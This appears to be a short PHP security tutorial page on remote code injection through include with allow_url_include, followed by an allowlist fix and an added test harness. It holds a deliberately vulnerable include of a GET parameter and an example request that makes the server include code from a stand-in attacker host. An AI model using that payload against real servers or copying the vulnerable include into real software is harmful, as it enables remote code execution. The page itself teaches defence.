SECURITY

  minte9
REMEMBERS




Last update:   11-05-2022

Remote code injection

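A remote code injection attack occurs when an attacker is able to execute PHP code of their choosing on the server. In the example below, a request parameter is used directly in an include path while allow_url_include is enabled, so the include can resolve to a remote URL.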
 
ini_set("allow_url_include", 1);

include "{$_GET['section']}/data.inc.php";
    // http://example.org/?section=evil.example.org/attack.php
    // include "http://evil.example.org/attack.php?data.inc.php"; // Look Here

Protection

Filter all input and never use tainted data in an include or require.
 
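// allow_url_include is still enabled here, as in the vulnerable example:
// the allowlist below blocks the attack regardless, but the setting
// should stay off (the PHP default) in production.
ini_set("allow_url_include", 1);

$sections = array('home', 'news', 'photos', 'blog');
$requested = isset($_GET['section']) ? $_GET['section'] : 'home';

// Strict comparison: only an exact string from the allowlist is accepted
$section = in_array($requested, $sections, true) ? $requested : 'home';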

include "$section/data.inc.php";
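
An added example (not part of the original notes) that runs the allowlist from the Protection snippet against constructed request values, including the one from the URL above, and records what was refused. The section_path() helper, the temporary directory layout and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. section_path(), the temp-dir
// layout and the request values below are constructed for illustration.
const SECTIONS = ['home', 'news', 'photos', 'blog'];

/** Map an untrusted request value to an include path; off-list values get 'home'. */
function section_path($input, string $baseDir, array &$rejected): string
{
    // Strict comparison: only an exact string match passes, so URLs,
    // arrays (?section[]=x) and wrong-case names are all refused.
    if (is_string($input) && in_array($input, SECTIONS, true)) {
        $section = $input;
    } else {
        $section = 'home';
        if ($input !== null) {
            $rejected[] = $input;   // raw value, kept for logging and alerting
        }
    }
    // The path is built from an entry of SECTIONS, never from $input itself.
    return "$baseDir/$section/data.inc.php";
}

// Throwaway site tree so the example runs on its own.
$base = sys_get_temp_dir() . '/sections_' . bin2hex(random_bytes(4));
foreach (SECTIONS as $s) {
    mkdir("$base/$s", 0700, true);
    file_put_contents("$base/$s/data.inc.php", "<?php return 'section: $s';");
}

$inputs = [                                  // constructed request values
    'news',                                  // legitimate section
    'evil.example.org/attack.php',           // value from the example URL above
    'http://evil.example.org/attack.php?',   // full remote URL form
    'NEWS',                                  // wrong case, not an exact match
    ['news'],                                // ?section[]=news arrives as an array
    null,                                    // parameter absent
];

$rejected = [];
foreach ($inputs as $in) {
    $result = include section_path($in, $base, $rejected);
    printf("%-40s -> %s\n", json_encode($in, JSON_UNESCAPED_SLASHES), $result);
}
printf("rejected (%d): %s\n", count($rejected), json_encode($rejected, JSON_UNESCAPED_SLASHES));

// Remove the throwaway tree.
foreach (SECTIONS as $s) { unlink("$base/$s/data.inc.php"); rmdir("$base/$s"); }
rmdir($base);
```

Only 'news' loads its own section; every other value falls back to 'home', and the refused values are collected so they can be logged.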
